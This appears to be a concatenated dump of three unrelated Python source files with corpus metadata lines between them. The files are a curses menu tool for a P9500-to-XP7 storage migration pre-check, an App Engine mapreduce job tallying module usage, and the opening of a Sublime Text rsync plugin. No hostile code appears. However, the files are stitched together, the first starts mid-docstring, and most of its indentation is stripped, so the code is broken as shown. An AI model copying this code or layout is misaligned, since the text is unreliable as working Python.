VERSION : Based on previous ODR framework
1.0 Initial version
1.1 Curses menu structure added
1.2 Add search term criteria
1.3 Add config file
2.0 Consistency check update
2.1 Add xpinfo file processing
CONFIG : xpmig.ini
LOG : xpmig_precheck.log
TODO :
add: generate a temporary HORCM file and daemon, run pairdisplay and check the pair status
####################################################################################################
"""
import curses
from curses import panel
import re
import logging
import logging.handlers
import copy
from ConfigParser import ConfigParser
import sys
import os
import os.path
import csv
import string
import xp7
####################################################################################################
### VARIABLES
####################################################################################################
linelen = 100
boxpair_dict = {}
serialnbr_dict = {}
instance_dict = {}
site_dict = {}
collectfile_dict = {}
box_dict = {}
####################################################################################################
### FUNCTIONS
####################################################################################################
####################################################################################################
### CLASSES
####################################################################################################
class Menu(object):
def __init__(self,window,items,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.position = 0
self.items = items
self.items.append(("exit","exit"))
def navigate(self,n):
self.position += n
if self.position < 0:
self.position = 0
elif self.position >= len(self.items):
self.position = len(self.items) - 1
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
while True:
self.window.refresh()
curses.doupdate()
for index,item in enumerate(self.items):
if index == self.position:
mode = curses.A_STANDOUT
else:
mode = curses.A_NORMAL
# line = "{}: {}".format(index,item[0])
line = "{}".format(item[0])
if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1+index,2,line,mode)
key = self.window.getch()
if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
if self.position == len(self.items) - 1:
break
else:
self.items[self.position][1]()
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class InputMenu(object):
def __init__(self,window,text,upd_obj,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.text = text
self.reply = ""
self.update_object = upd_obj
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
line = "{}: ".format(self.text)
        if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1,2,line)
curses.echo()
self.window.refresh()
curses.doupdate()
self.reply = self.window.getstr()
### after we received the response ###
self.update_object.set(self.reply)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.noecho()
curses.doupdate()
class Selection(object):
def __init__(self,window,title,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.title = title
self.selection = []
def display(self):
self.window.clear()
line = "{} : {}".format(self.title, ",".join(["{}-{}".format(x[0],x[1]) for x in self.selection]))
if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1,2,line)
self.window.border()
self.window.refresh()
curses.doupdate()
def add(self,item):
current_set = set(self.selection)
current_set.add(item)
self.selection = list(sorted(current_set))
self.display()
def clear(self):
del self.selection[:]
self.display()
def get(self):
return self.selection
class Search(object):
def __init__(self,window,title,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.title = title
self.search_str = ""
def display(self):
self.window.clear()
line = "{}: {}".format(self.title,self.search_str)
if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1,2,line)
self.window.border()
self.window.refresh()
curses.doupdate()
def set(self,search_str):
self.search_str = search_str
self.display()
def clear(self):
self.search_str = ""
self.display()
def get(self):
return self.search_str
class Consistent(object):
def __init__(self,window,title,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.title = title
self.consistent = []
def display(self):
self.window.clear()
line = "{}: {}".format(self.title,",".join(["{}-{}".format(x[0],x[1]) for x in self.consistent]))
if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1,2,line)
self.window.border()
self.window.refresh()
curses.doupdate()
def add(self,item):
current_set = set(self.consistent)
current_set.add(item)
self.consistent = list(sorted(current_set))
self.display()
def clear(self):
del self.consistent[:]
self.display()
def get(self):
return self.consistent
class ShowSummaryMenu(object):
def __init__(self,window,selection,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.selection = selection
self.hostgroup_summary = []
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.display_list = []
def navigate(self,n):
if n < 0:
if self.slice_start >= 1:
self.slice_start += n
if self.slice_start < 0:
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
elif n > 0:
if self.slice_end < len(self.display_list) - 1:
self.slice_end += n
if self.slice_end > len(self.display_list) - 1:
self.slice_end = len(self.display_list) - 1
self.slice_start = self.slice_end - self.slice_len
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.heigth,self.width = self.window.getmaxyx()
### fill the list to display ###
self.display_list = []
for box_name,hostgroup_name in self.selection.get():
self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name))
### now we know what to display ###
self.slice_start = 0
self.slice_len = min(len(self.display_list),self.heigth-6)
self.slice_end = self.slice_start + self.slice_len
while True:
self.window.clear()
self.window.refresh()
curses.doupdate()
for index,item in enumerate(self.display_list):
if len(item) >= self.width:
item = item[:self.width-1]
if self.slice_start <= index <= self.slice_end:
self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL)
key = self.window.getch()
if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
break
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
elif key == curses.KEY_PPAGE:
self.navigate(-10)
elif key == curses.KEY_NPAGE:
self.navigate(10)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class ShowConsistencyMenu(object):
def __init__(self,window,selection,consistent,stdscr):
self.window = window
self.selection = selection
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.display_list = []
self.consistent = consistent
def navigate(self,n):
if n < 0:
if self.slice_start >= 1:
self.slice_start += n
if self.slice_start < 0:
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
elif n > 0:
if self.slice_end < len(self.display_list) - 1:
self.slice_end += n
if self.slice_end > len(self.display_list) - 1:
self.slice_end = len(self.display_list) - 1
self.slice_start = self.slice_end - self.slice_len
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.heigth,self.width = self.window.getmaxyx()
### fill the list to display ###
self.display_list = []
for box_name,hostgroup_name in self.selection.get():
if box_dict[box_name].test_hostgroup_exists(hostgroup_name):
### TODO: add CA check ###
result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name)
self.display_list.extend(report)
if result:
self.consistent.add((box_name,hostgroup_name))
logger.info("{}-{} added to consistent hostgroup list during consistency check".format(box_name,hostgroup_name))
else:
logger.error("{}-{} not added to consistent hostgroup list during consistency check".format(box_name,hostgroup_name))
else:
logger.debug("{}-{} does not exists".format(box_name,hostgroup_name))
### now we know what to display ###
self.slice_start = 0
self.slice_len = min(len(self.display_list),self.heigth-6)
self.slice_end = self.slice_start + self.slice_len
while True:
self.window.clear()
self.window.refresh()
curses.doupdate()
for index,item in enumerate(self.display_list):
if len(item) >= self.width:
item = item[:self.width-1]
if self.slice_start <= index <= self.slice_end:
self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL)
key = self.window.getch()
if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
break
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
elif key == curses.KEY_PPAGE:
self.navigate(-10)
elif key == curses.KEY_NPAGE:
self.navigate(10)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class ShowWriteProvisionMenu(object):
def __init__(self,window,consistent,map_dir,stdscr):
self.window = window
self.consistent = consistent
self.map_dir = map_dir
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.window.addstr(1,2,"Write provisioning out to file for the consistent HOSTGROUPs ? (Y/n)")
key = self.window.getch()
if key in [curses.KEY_ENTER,ord("\n"),ord("Y"),ord("y")]:
### write out the ldevs to file ###
for box_name,hostgroup_name in self.consistent.get():
if box_dict[box_name].test_hostgroup_exists(hostgroup_name):
sf = os.path.join(self.map_dir,"{}_{}.prov".format(box_name,hostgroup_name))
with open(sf,"wt") as sfh:
box_dict[box_name].print_provisioning(hostgroup_name,sfh)
self.window.addstr(2,2,"Written..")
else:
self.window.addstr(2,2,"Cancelled..")
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class Select_Menu(object):
def __init__(self,window,items,selection,search,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
### items is a dict ###
self.items = items
self.filtered_items = copy.copy(self.items.keys())
self.filtered_items.append("exit")
### slice is a view on the items which fits in the window ###
self.slice_start = 0
self.slice_len = min(len(self.filtered_items)-1,self.heigth-6)
self.slice_end = self.slice_start + self.slice_len
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.position = 0
self.selection = selection
self.search = search
def update(self):
"""
update the selection items list to match the new search criteria
"""
if self.search.get() != "":
logger.debug("Select_Menu.update :: update items to match search str {}".format(self.search.get()))
self.filtered_items = [x for x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)]
else:
logger.debug("Select_Menu.update :: update items to match search all")
self.filtered_items = copy.copy(self.items.keys())
self.filtered_items.append("exit")
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
self.position = 0
def navigate(self,n):
self.position += n
if self.position < 0:
self.position = 0
elif self.position >= len(self.filtered_items):
self.position = len(self.filtered_items) - 1
logger.debug("Select_Menu.navigate :: position = {}, n = {}".format(self.position,n ))
### adjust slice ###
if n < 0:
if self.position - self.slice_start < 2 and self.slice_start >= 1:
### slide slice up ###
self.slice_start += n
if self.slice_start < 0:
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
logger.debug("Select_Menu.navigate :: slide slice up to {}-{}".format(self.slice_start,self.slice_end ))
elif n > 0:
if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) - 1:
### slide slice down ###
self.slice_end += n
if self.slice_end > len(self.filtered_items) - 1:
self.slice_end = len(self.filtered_items) - 1
self.slice_start = self.slice_end - self.slice_len
logger.debug("Select_Menu.navigate :: slide slice down to {}-{}".format(self.slice_start,self.slice_end ))
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.update()
while True:
self.window.clear()
self.window.refresh()
curses.doupdate()
for index,item in enumerate(self.filtered_items):
if index == self.position:
mode = curses.A_STANDOUT
else:
mode = curses.A_NORMAL
# line = "{}: {}".format(index,item)
line = "{}".format(item)
if len(line) >= self.width:
line = line[:self.width-1]
### only add lines in the slice ###
# logger.debug("SelectMenu.display :: about to addstr line {}".format(line))
if self.slice_start <= index <= self.slice_end:
# logger.debug("SelectMenu.display :: index in slice {} - {}, executing addstr".format(self.slice_start,self.slice_end))
self.window.addstr(1+(index-self.slice_start),2,line,mode)
key = self.window.getch()
if key in [ord("b"),ord("B")]:
break
elif key in [curses.KEY_ENTER,ord("\n")]:
if self.position == len(self.filtered_items) - 1:
break
else:
# self.items = {"select_str":[(boxpair_name,hostgroup_name),...]}
# self.selection.add(self.items[self.filtered_items[self.position]])
for add_item in self.items[self.filtered_items[self.position]]:
self.selection.add(add_item)
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
elif key == curses.KEY_PPAGE:
self.navigate(-10)
elif key == curses.KEY_NPAGE:
self.navigate(10)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class Select_XPinfo(object):
def __init__(self,window,selection,xpinfo_dir,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.xpinfo_file_list =[]
self.slice_start = 0
self.slice_len = 0
self.slice_end = 0
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.position = 0
self.xpinfo_dir = xpinfo_dir
self.selection = selection
def update(self):
"""
update the list of xpinfo files present
"""
if os.path.exists(self.xpinfo_dir):
del(self.xpinfo_file_list[:])
self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile("{}/{}".format(self.xpinfo_dir,f)) and re.match(".+\.xpinfo$",f,flags=re.IGNORECASE)]
self.xpinfo_file_list.append("exit")
self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6)
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
self.position = 0
def navigate(self,n):
self.position += n
if self.position < 0:
self.position = 0
elif self.position >= len(self.xpinfo_file_list):
self.position = len(self.xpinfo_file_list) - 1
if n < 0:
if self.position - self.slice_start < 2 and self.slice_start >= 1:
### slide slice up ###
self.slice_start += n
if self.slice_start < 0:
self.slice_start = 0
self.slice_end = self.slice_start + self.slice_len
elif n > 0:
if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1:
### slide slice down ###
self.slice_end += n
if self.slice_end > len(self.xpinfo_file_list) - 1:
self.slice_end = len(self.xpinfo_file_list) - 1
self.slice_start = self.slice_end - self.slice_len
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
self.update()
while True:
self.window.clear()
self.window.refresh()
curses.doupdate()
### show the list of xpinfo files ###
for index,item in enumerate(self.xpinfo_file_list):
if index == self.position:
mode = curses.A_STANDOUT
else:
mode = curses.A_NORMAL
line = "{}".format(item)
if len(line) >= self.width:
line = line[:self.width-1]
### only add lines in the slice ###
if self.slice_start <= index <= self.slice_end:
self.window.addstr(1+(index-self.slice_start),2,line,mode)
key = self.window.getch()
if key in [ord("b"),ord("B")]:
break
elif key in [curses.KEY_ENTER,ord("\n")]:
if self.position == len(self.xpinfo_file_list) - 1:
break
else:
logger.debug("XPINFO: start processing {}".format(self.xpinfo_file_list[self.position]))
serial_nbr_set = set(serialnbr_dict.values())
ldev_dict = {}
hostgroup_dict = {}
for serial_nbr in serial_nbr_set:
ldev_dict[serial_nbr] = set()
### process the selected xpinfo file ###
with open("{}/{}".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),"rt") as f:
xpinfo_file_reader = csv.reader(f,delimiter=",",quotechar="'")
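                        # xpinfo CSV fields used below: 0=hostname, 1=device file, 5=LDEV number, 8=array serial number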
for row in xpinfo_file_reader:
if len(row) > 8:
hostname = row[0]
device_name = row[1]
ldev_nbr = xp7.standard_format_ldev(row[5])
serial_nbr = int(row[8])
logger.debug("XPINFO: got S/N {} LDEV {} from xpinfo file".format(serial_nbr,ldev_nbr))
if serial_nbr in ldev_dict:
ldev_dict[serial_nbr].add(ldev_nbr)
logger.debug("XPINFO: known S/N, added to ldev_dict, now at {} elements".format(len(ldev_dict[serial_nbr])))
else:
logger.error("XPINFO: line too short to be valid, skipping {}".format(row))
### translate ldev to hostgroup ###
for serial_nbr in ldev_dict:
box_name = serial_to_name_dict[serial_nbr]
if not box_name in hostgroup_dict:
hostgroup_dict[box_name] = set()
for ldev_nbr in ldev_dict[serial_nbr]:
for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr):
hostgroup_dict[box_name].add(hostgroup_name)
### add found hostgroups to the selection ###
for box_name in hostgroup_dict:
for hostgroup_name in hostgroup_dict[box_name]:
logger.debug("XPINFO processing: adding {}-{} to the selection".format(box_name,hostgroup_name))
self.selection.add((box_name,hostgroup_name))
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
elif key == curses.KEY_PPAGE:
self.navigate(-10)
elif key == curses.KEY_NPAGE:
self.navigate(10)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
####################################################################################################
### MAIN
####################################################################################################
def main(stdscr):
### clear screen ###
stdscr.clear()
### check window heigth and width ###
if curses.COLS < 20 or curses.LINES < 20:
sys.stderr.write("Window not large enough, exiting ..\n")
sys.exit(1)
### define title_win ###
title_win = stdscr.subwin(3,curses.COLS,0,0)
title_win.addstr(1,2,"HPE P9500 TO XP7 MIGRATION PRE-CHECK")
title_win.border()
### define search_win ###
search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0)
search = Search(search_win,"Display HOSTGROUPS matching this SEARCH expression",stdscr)
search.display()
### define selection_win ###
select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0)
selection = Selection(select_win,"SELECTED HOSTGROUP(s)",stdscr)
selection.display()
### define consistent_win ###
consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0)
consistent = Consistent(consistent_win,"CONSISTENT HOSTGROUP(s)",stdscr)
consistent.display()
### define key_win ###
key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0)
#key_win.clear()
#key_win.refresh()
#curses.doupdate()
key_win.addstr(0,2,"<ARROW-UP or PAGE-UP> SCROLL UP <ARROW-DOWN or PAGE-DOWN> SCROLL DOWN <B> BACK",curses.A_BOLD)
### define menu_win ###
menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0)
# menu_win.border()
main_menu_items = []
input_search = InputMenu(menu_win,"Specify new search string",search,stdscr)
main_menu_items.append(("Set SEARCH string",input_search.display))
main_menu_items.append(("Clear SEARCH string",search.clear))
### select hostgroups by box ###
for boxpair_name in sorted(boxpair_dict.keys()):
select_item_dict = {}
for box_name in boxpair_dict[boxpair_name]:
hostgroup_name_list = box_dict[box_name].get_hostgroups()
for hostgroup_name in hostgroup_name_list:
if hostgroup_name not in select_item_dict:
select_item_dict[hostgroup_name] = set()
select_item_dict[hostgroup_name].add((box_name,hostgroup_name))
hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
main_menu_items.append(("Select {} HOSTGROUP".format(boxpair_name),hg_by_box_menu.display))
### select hostgroups by host (hba_wwn) ###
select_item_dict = {}
for boxpair_name in sorted(boxpair_dict.keys()):
for box_name in boxpair_dict[boxpair_name]:
hostgroup_name_list = box_dict[box_name].get_hostgroups()
for hostgroup_name in hostgroup_name_list:
hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name)
for hba_wwn in hba_wwn_list:
if len(hba_wwn.nickname.split("_")) > 1:
sel_item = hba_wwn.nickname.split("_")[0]
else:
sel_item = hba_wwn.nickname
if "{}-{}".format(box_name,sel_item) not in select_item_dict:
select_item_dict["{}-{}".format(box_name,sel_item)] = set()
select_item_dict["{}-{}".format(box_name,sel_item)].add((box_name,hostgroup_name))
hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
main_menu_items.append(("Select by HOSTNAME",hg_by_host_menu.display))
### select hostgroups by name ###
select_item_dict = {}
for boxpair_name in sorted(boxpair_dict.keys()):
for box_name in boxpair_dict[boxpair_name]:
hostgroup_name_list = box_dict[box_name].get_hostgroups()
for hostgroup_name in hostgroup_name_list:
if hostgroup_name not in select_item_dict:
select_item_dict[hostgroup_name] = set()
select_item_dict[hostgroup_name].add((box_name,hostgroup_name))
hg_by_name_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr)
main_menu_items.append(("Select by HOSTGROUP",hg_by_name_menu.display))
### read XPINFO file ###
xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr)
main_menu_items.append(("Read XPINFO file",xpinfo_menu.display))
### show hostgroup summary menu ###
hostgroup_summary = ShowSummaryMenu(menu_win,selection,stdscr)
main_menu_items.append(("Show HOSTGROUPs summary",hostgroup_summary.display))
### show hostgroup consistency menu ###
hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr)
main_menu_items.append(("Show HOSTGROUPs consistency check results",hostgroup_consistency.display))
main_menu_items.append(("Clear HOSTGROUP selection",selection.clear))
main_menu_items.append(("Clear consistent HOSTGROUP",consistent.clear))
write_prov = ShowWriteProvisionMenu(menu_win,consistent,map_dir,stdscr)
main_menu_items.append(("Write PROVISION file",write_prov.display))
main_menu = Menu(menu_win,main_menu_items,stdscr)
main_menu.display()
### refresh & wait ###
stdscr.refresh()
stdscr.getkey()
####################
### parse config ###
####################
configfile = "xpmig.ini"
cfg = ConfigParser()
cfg.read(configfile)
for mandatory_section in ("boxpair","serialnbr","instance","site","collect","dir"):
if not cfg.has_section(mandatory_section):
sys.stderr("{} section missing in config file {}, exiting..".format(mandatory_section,configfile))
sys.exit(1)
for name,value in cfg.items("boxpair"):
boxpair_dict[name.upper()] = value.split(",")
for name,value in cfg.items("serialnbr"):
serialnbr_dict[name.upper()] = int(value)
for name,value in cfg.items("instance"):
instance_dict[name.upper()] = int(value)
for name,value in cfg.items("site"):
site_dict[name.upper()] = value
for name,value in cfg.items("collect"):
collectfile_dict[name.upper()] = value
try:
log_level = cfg.getint("log","level")
except:
log_level = 30
try:
log_size = cfg.getint("log","maxsize")
except:
log_size = 100000000
try:
log_versions = cfg.getint("log","maxversions")
except:
log_versions = 5
try:
log_dir = cfg.get("dir","log")
except:
sys.stderr.write("log file dir not defined, exiting..\n")
sys.exit(1)
try:
xpinfo_dir = cfg.get("dir","xpinfo")
except:
sys.stderr.write("xpinfo file dir not defined, exiting..\n")
sys.exit(1)
try:
collect_dir = cfg.get("dir","collect")
except:
sys.stderr.write("collect file dir not defined, exiting..\n")
sys.exit(1)
try:
map_dir = cfg.get("dir","map")
except:
sys.stderr.write("map file dir not defined, exiting..\n")
sys.exit(1)
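# Build the reverse lookup: array serial number -> box name (used when importing xpinfo files)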
serial_to_name_dict = {}
for box_name,serial_nbr in serialnbr_dict.items():
serial_to_name_dict[serial_nbr] = box_name
#####################
### start logging ###
#####################
logfile = os.path.join(log_dir,"xpmig_precheck.log")
logger = logging.getLogger("xpmig_precheck")
logger.setLevel(log_level)
fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s","%Y/%m/%d-%H:%M:%S")
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.info("#" * linelen)
logger.info("XPMIG PRECHECK started")
logger.info("#" * linelen)
logger.info("Configuration settings :")
logger.info("BOXPAIR :")
logger.info(boxpair_dict)
logger.info("SERIAL NBRs:")
logger.info(serialnbr_dict)
logger.info("INSTANCE NBRs:")
logger.info(instance_dict)
logger.info("SITE NBRs:")
logger.info(site_dict)
logger.info("COLLECT FILEs:")
logger.info(collectfile_dict)
logger.info("XPINFO dir: {}".format(xpinfo_dir))
#########################
### instantiate boxes ###
#########################
for box_name in collectfile_dict:
collect_file = os.path.join(collect_dir,collectfile_dict[box_name])
if box_name in instance_dict:
instance_nbr = instance_dict[box_name]
else:
err_msg = "No HORCM instance nbr defined for box {}, exiting..".format(box_name)
logger.error(err_msg)
        sys.stderr.write(err_msg + "\n")
sys.exit(1)
if box_name in serialnbr_dict:
serial_nbr = serialnbr_dict[box_name]
else:
err_msg = "No serial nbr defined for box {}, exiting..".format(box_name)
logger.error(err_msg)
        sys.stderr.write(err_msg + "\n")
sys.exit(1)
if box_name in site_dict:
site = site_dict[box_name]
else:
err_msg = "No site defined for box {}, exiting..".format(box_name)
logger.error(err_msg)
        sys.stderr.write(err_msg + "\n")
sys.exit(1)
box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file)
logger.info("XP7 object created for box {} :".format(box_name))
logger.info(box_dict[box_name])
#####################
### start menu ###
#####################
curses.wrapper(main)
logger.info("#" * linelen)
logger.info("XPMIG PRECHECK ended")
logger.info("#" * linelen) | 1.78125 | 2 |
src/solutions/common/job/module_statistics.py | goubertbrent/oca-backend | 0 | 12794286 | <filename>src/solutions/common/job/module_statistics.py
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
import datetime
import json
import logging
import time
import cloudstorage
from mapreduce import mapreduce_pipeline
from pipeline import pipeline
from pipeline.common import List
from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET
from rogerthat.dal.service import get_service_identities
from rogerthat.settings import get_server_settings
from rogerthat.utils import guid, log_offload
def start_job():
current_date = datetime.datetime.now()
key = 'module_stats_%s_%s' % (current_date.strftime('%Y-%m-%d'), guid())
counter = ModuleStatsPipeline(PIPELINE_BUCKET, key, time.mktime(current_date.timetuple()))
task = counter.start(idempotence_key=key, return_task=True)
task.add(queue_name=STATS_QUEUE)
redirect_url = '%s/status?root=%s' % (counter.base_path, counter.pipeline_id)
logging.info('ModuleStats pipeline url: %s', redirect_url)
return get_server_settings().baseUrl + redirect_url
def mapper(sln_settings):
# type: (SolutionSettings) -> GeneratorType
for service_identity in get_service_identities(sln_settings.service_user):
yield service_identity.app_id, str(sln_settings.modules)
def _combine(new_values, previous_combined_values):
# type: (list[list[str]], list[dict[str, int]]) -> dict[str, int]
combined = {}
for stats in previous_combined_values:
for module, count in stats.iteritems():
if module not in combined:
combined[module] = count
else:
combined[module] += count
for v in new_values:
# mapper returns a string
modules = eval(v) if isinstance(v, basestring) else v
for module in modules:
if module not in combined:
combined[module] = 1
else:
combined[module] += 1
return combined
def combiner(key, new_values, previously_combined_values):
# type: (str, list[list[str]], list[dict[str, int]]) -> GeneratorType
if DEBUG:
logging.debug('combiner %s new_values: %s', key, new_values)
logging.debug('combiner %s previously_combined_values: %s', key, previously_combined_values)
combined = _combine(new_values, previously_combined_values)
if DEBUG:
logging.debug('combiner %s combined: %s', key, combined)
yield combined
def reducer(app_id, values):
# type: (str, list[dict[str, int]]) -> GeneratorType
if DEBUG:
logging.info('reducer values: %s', values)
combined = _combine([], values)
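    # One JSON line per app; these lines are read back by ProcessFilePipeline further down.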
json_line = json.dumps({'app_id': app_id, 'stats': combined})
if DEBUG:
logging.debug('reducer %s: %s', app_id, json_line)
yield '%s\n' % json_line
class ModuleStatsPipeline(pipeline.Pipeline):
def run(self, bucket_name, key, current_date):
# type: (str, str, long) -> GeneratorType
params = {
'mapper_spec': 'solutions.common.job.module_statistics.mapper',
'mapper_params': {
'bucket_name': bucket_name,
'entity_kind': 'solutions.common.models.SolutionSettings',
'filters': []
},
'combiner_spec': 'solutions.common.job.module_statistics.combiner',
'reducer_spec': 'solutions.common.job.module_statistics.reducer',
'reducer_params': {
'output_writer': {
'bucket_name': bucket_name
}
},
'input_reader_spec': 'mapreduce.input_readers.DatastoreInputReader',
'output_writer_spec': 'mapreduce.output_writers.GoogleCloudStorageConsistentOutputWriter',
'shards': 2 if DEBUG else 10
}
output = yield mapreduce_pipeline.MapreducePipeline(key, **params)
process_output_pipeline = yield ProcessOutputPipeline(output, current_date)
with pipeline.After(process_output_pipeline):
yield CleanupGoogleCloudStorageFiles(output)
def finalized(self):
if self.was_aborted:
logging.error('%s was aborted', self, _suppress=False)
return
logging.info('%s was finished', self)
class ProcessOutputPipeline(pipeline.Pipeline):
def run(self, output, current_date):
results = []
for filename in output:
results.append((yield ProcessFilePipeline(filename)))
yield List(*results)
def finalized(self):
if DEBUG:
logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value)
_, timestamp = self.args
# list of dicts with key app_id, value dict of module, amount
outputs = self.outputs.default.value # type: list[dict[int, int]]
for output in outputs:
log_offload.create_log(None, 'oca.active_modules', output, None, timestamp=timestamp)
class ProcessFilePipeline(pipeline.Pipeline):
def run(self, filename):
stats_per_app = {}
with cloudstorage.open(filename, "r") as f:
for json_line in f:
d = json.loads(json_line)
stats_per_app[d['app_id']] = d['stats']
if DEBUG:
logging.debug('ProcessFilePipeline: %s', stats_per_app)
return stats_per_app
class CleanupGoogleCloudStorageFiles(pipeline.Pipeline):
def run(self, output):
for filename in output:
cloudstorage.delete(filename)
| 1.6875 | 2 |
commands.py | devaos/sublime-remote | 2 | 12794287 | <reponame>devaos/sublime-remote<gh_stars>1-10
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 <NAME>
# http://github.com/devaos/sublime-remote/blob/master/LICENSE
"""This module implements the Sublime Text 3 commands provided by remote."""
import os
import re
import sys
import sublime
import sublime_plugin
import subprocess
import threading
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
import remote.sublime_api as sublime_api
import remote.sync_api as sync_api
import remote.vagrant_api as vagrant_api
# =============================================================================
class RsyncOptionsCommand(sublime_plugin.TextCommand):
"""Override default rsync options for Remote."""
def run(self, edit, paths):
sublime.set_timeout_async(lambda: rsync_options(paths[0], None), 0)
def rsync_options(path, callback):
print("Local path", path)
w = sublime.active_window()
def done_with_options(userInput):
print("Options", userInput)
if len(userInput) == 0:
do_it(sync_api.default_rsync_options())
return True
do_it(userInput)
return True
def do_it(rsyncOptions):
settings = {"rsyncOptions": rsyncOptions}
sublime_api.update_project_settings(w, path, settings)
if callback is not None:
callback(settings)
options = sync_api.default_rsync_options()
found = sublime_api.project_by_path(w, path)
if found is not None and found["rsyncOptions"] != "":
options = found["rsyncOptions"]
sublime_api.show_input_panel("Use these rsync options:",
options, done_with_options, None, None)
# =============================================================================
class AddRemoteCommand(sublime_plugin.TextCommand):
"""Map a new remote path to a local project path."""
def run(self, edit, paths):
sublime.set_timeout_async(lambda: add_remote_async(paths[0], None), 0)
def add_remote_async(path, callback):
print("Local path", path)
w = sublime.active_window()
def done_with_folder(userInput):
print("Remote path", userInput)
if len(userInput) == 0:
do_it("", "")
return True
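        # Expected formats: "host:/remote/path" or "user@host:/remote/path"; the host "vagrant" triggers VM selection below.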
parts = userInput.split(":")
if len(parts) != 2:
sublime_api.error_message("The remote path you entered does not" +
" appear to contain a host")
